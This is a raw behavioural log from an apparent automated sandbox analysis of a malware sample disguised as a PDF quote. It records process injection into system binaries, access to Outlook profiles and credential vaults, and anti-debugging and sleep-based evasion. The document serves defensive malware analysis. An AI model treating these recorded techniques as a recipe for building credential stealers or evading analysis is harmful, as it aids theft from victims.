            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: quote894590895pdf.exeStatic file information: File size 1184768 > 1048576
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: quote894590895pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000001.00000003.2091696236.0000000003234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2091542345.000000000321B000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000002.3585138794.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000001.00000003.2091696236.0000000003234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2091542345.000000000321B000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000005.00000002.3585138794.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: csDaoUagQFfwf.exe, 00000005.00000002.3584953485.000000000055E000.00000002.00000001.01000000.00000005.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3584631853.000000000055E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: quote894590895pdf.exe, 00000000.00000003.1725112993.0000000004780000.00000004.00001000.00020000.00000000.sdmp, quote894590895pdf.exe, 00000000.00000003.1725432268.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2023247338.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2025297928.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.000000000526E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2123546944.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2126127182.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.00000000050D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: quote894590895pdf.exe, 00000000.00000003.1725112993.0000000004780000.00000004.00001000.00020000.00000000.sdmp, quote894590895pdf.exe, 00000000.00000003.1725432268.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2023247338.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2025297928.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2123694316.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.000000000526E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2123546944.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2126127182.0000000004F20000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3585874806.00000000050D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000006.00000002.3586231095.00000000056FC000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000006.00000002.3584832817.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3585941333.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2443157559.00000000002FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000006.00000002.3586231095.00000000056FC000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000006.00000002.3584832817.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, csDaoUagQFfwf.exe, 00000007.00000002.3585941333.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2443157559.00000000002FC000.00000004.80000000.00040000.00000000.sdmp
            Source: quote894590895pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: quote894590895pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: quote894590895pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: quote894590895pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: quote894590895pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EDC104 LoadLibraryA,GetProcAddress,0_2_00EDC104
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC8538 push FFFFFF8Bh; iretd 0_2_00EC853A
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8E88F push edi; ret 0_2_00E8E891
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8E9A8 push esi; ret 0_2_00E8E9AA
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E88AC5 push ecx; ret 0_2_00E88AD8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8EB83 push esi; ret 0_2_00E8EB85
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8EC6C push edi; ret 0_2_00E8EC6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418055 push ebp; ret 1_2_00418181
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413063 push esi; retf 1_2_0041306E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041407F pushfd ; retf 1_2_00414081
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C18A push 00000045h; iretd 1_2_0040C18C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414240 push ss; ret 1_2_00414365
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AA21 push ss; retf 1_2_0040AA22
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403340 push eax; ret 1_2_00403342
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418BA1 pushad ; iretd 1_2_00418BA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D51E push 00000066h; ret 1_2_0040D523
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D534 push eax; iretd 1_2_0040D556
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418DEE push ds; ret 1_2_00418DEF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5A4 push cs; iretd 1_2_0041A5A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E627 pushfd ; ret 1_2_0041E628
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411FB5 push ecx; iretd 1_2_00411FB6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147BF push ebp; iretd 1_2_004147DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx1_2_039309B6
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AF3F0 push eax; retf 5_2_032AF3F2
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AFBD6 pushad ; iretd 5_2_032AFBD7
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A31BF push 00000045h; iretd 5_2_032A31C1
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AF08A push ebp; ret 5_2_032AF1B6
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AA098 push esi; retf 5_2_032AA0A3
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032A8FEA push ecx; iretd 5_2_032A8FEB
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AB7F4 push ebp; iretd 5_2_032AB810
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032AFE23 push ds; ret 5_2_032AFE24
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeCode function: 5_2_032B565C pushfd ; ret 5_2_032B565D
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E64A35
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EE53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EE53DF
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E83307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E83307
            Source: C:\Users\user\Desktop\quote894590895pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\quote894590895pdf.exeAPI/Special instruction interceptor: Address: 1AB922C
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 9818Jump to behavior
            Source: C:\Users\user\Desktop\quote894590895pdf.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 8168Thread sleep count: 153 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 8168Thread sleep time: -306000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 8168Thread sleep count: 9818 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exe TID: 8168Thread sleep time: -19636000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe TID: 8188Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe TID: 8188Thread sleep time: -31500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EC449B
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ECC7E8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECC75D FindFirstFileW,FindClose,0_2_00ECC75D
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ECF021
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00ECF17E
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ECF47F
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EC3833
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EC3B56
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ECBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ECBD48
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E64AFE
            Source: csDaoUagQFfwf.exe, 00000007.00000002.3585198241.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: firefox.exe, 00000008.00000002.2444370174.0000027F401CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
            Source: isoburn.exe, 00000006.00000002.3584832817.00000000032E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\quote894590895pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97178
            Source: C:\Users\user\Desktop\quote894590895pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-97252
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174B3 LdrLoadDll,1_2_004174B3
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED401F BlockInput,0_2_00ED401F
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E63B4C
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E95BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E95BFC
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EDC104 LoadLibraryA,GetProcAddress,0_2_00EDC104
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_01AB9498 mov eax, dword ptr fs:[00000030h]0_2_01AB9498
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_01AB94F8 mov eax, dword ptr fs:[00000030h]0_2_01AB94F8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_01AB7E78 mov eax, dword ptr fs:[00000030h]0_2_01AB7E78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]1_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]1_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]1_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]1_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]1_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h]1_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
